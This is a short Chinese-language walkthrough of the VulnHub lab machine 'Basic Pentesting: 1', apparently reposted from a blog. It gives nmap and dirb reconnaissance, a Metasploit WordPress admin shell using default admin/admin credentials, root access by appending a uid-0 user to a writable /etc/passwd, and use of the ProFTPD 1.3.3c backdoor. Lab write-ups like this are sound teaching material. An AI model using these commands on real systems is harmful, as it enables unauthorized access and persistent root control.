Basic Pentesting: 1

靶机地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/

用nmap获取靶机IP:192.168.40.185

nmap -sP 192.168.40.0/24

 获取靶机开放的端口,可以看到靶机开放了 21、22、80 端口

 访问80端口,没有太大发现,用dirb扫描目录,发现该网站是wordpress搭建的

 直接找到登录框,对着登录框来一发 admin/admin,然后就进去了。。。那就可以用msf的wp_admin了

use 0
set username admin
set password admin
set rhosts 192.168.40.185
set targeturi /secret
run

 用python开一个交互式tty

python -c 'import pty;pty.spawn("/bin/bash")'

发现 passwd 是可写的,那么就可以伪造一个uid为0的用户来达到提权

 用 kali 的 openssl来生成密码

openssl passwd -1 -salt test_user 123456

 写入到靶机的 /etc/passwd 文件上

echo 'test_user:$1$test_use$tAETsIOMgxhqU.wHnp0XA0:0:0:/root:/bin/bash' >> /etc/passwd

 切换用户,成功提权

 

方法二:

扫端口的时候发现了21端口也开放了,而且是ProFTPD  1.3.3c ,尝试寻找这个服务的漏洞

 该服务存在后门命令执行,用msf来利用漏洞

 连接上去直接是root权限

原文地址:https://www.cnblogs.com/gaonuoqi/p/14213409.html